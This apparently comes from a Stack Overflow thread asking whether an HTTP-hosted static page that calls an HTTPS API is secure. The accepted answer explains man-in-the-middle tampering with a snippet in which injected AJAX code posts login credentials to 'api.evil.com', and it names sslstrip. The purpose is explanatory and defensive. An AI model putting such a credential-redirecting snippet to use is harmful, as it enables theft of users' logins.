# Ajax HTTPS but static content hosted on HTTP

Tags: ajax, security, http, ssl, amazon-web-services

If I have a completely static frontend at `http://domain.com` and AJAX in the relevant data from `https://api.domain.com`, will all of the data transmitted between them be secure (as though both used `https`)?

Is there a potential flaw with this model?

The reason I'm asking is because then I can use a service like Amazon S3 to host my static webpage and simply pay for a cert on my API.

Comment: The only issue that I can think of is that it wont display an SSL cert in the browser bar to the user.

Comment: [Your login form posts to HTTPS, but you blew it when you loaded it over HTTP](http://www.troyhunt.com/2013/05/your-login-form-posts-to-https-but-you.html)

Comment: @SilverlightFox mind posting that as an answer?

Answer (score 1, accepted):

Apart from the fact that this model results in only a partially encrypted page so the padlock and `https` cannot be shown to the user in the address bar, they cannot (rightly) verify that your site is the genuine one, it could also be possible for a [MITM](https://www.owasp.org/index.php/Man-in-the-middle_attack) attack to be executed on your HTTP content and redirect further communications to the attacker.

e.g. your AJAX code loaded over HTTP could be as follows:

```
$.ajax({
    type: 'POST',
    url: 'https://api.domain.com/LogIn',
```

If the attacker intercepts the response from your server to the victim and modifies it to

```
$.ajax({
    type: 'POST',
    url: 'http://api.evil.com/LogIn',
```

the user's credentials will be sent to the attacker instead of your website and if your attacker then forwarded them onto your website afterwards the victim would be non the wiser that their details have been stolen.

Tools such as [sslstrip](http://www.thoughtcrime.org/software/sslstrip/) can make it very easy for an attacker to accomplish this (assuming they are suitably positioned, which is a requirement of all MITM attacks).

Comment: thank you for alerting me to this. here is a related question i started on the security stackexchange: http://security.stackexchange.com/questions/54744/https-login-vs-mitm-attack

Answer (score 1):

I think this approach is fine.

Keep all your heavily accessed and static pages on S3 (even use Cloudfront to speed up further). One good example is the home page of your service, some help pages etc. These pages can be on http as there is nothing private in them.

When you then require users to login and access "private" content, send them to another domain like secure.domain.com on https. Then on all the content is secured and users will get confidence to login, as they see the secure green lock in the browser when they are doing login etc. Since your APIs also hopefully be requiring privacy that also should operate on the secure domain.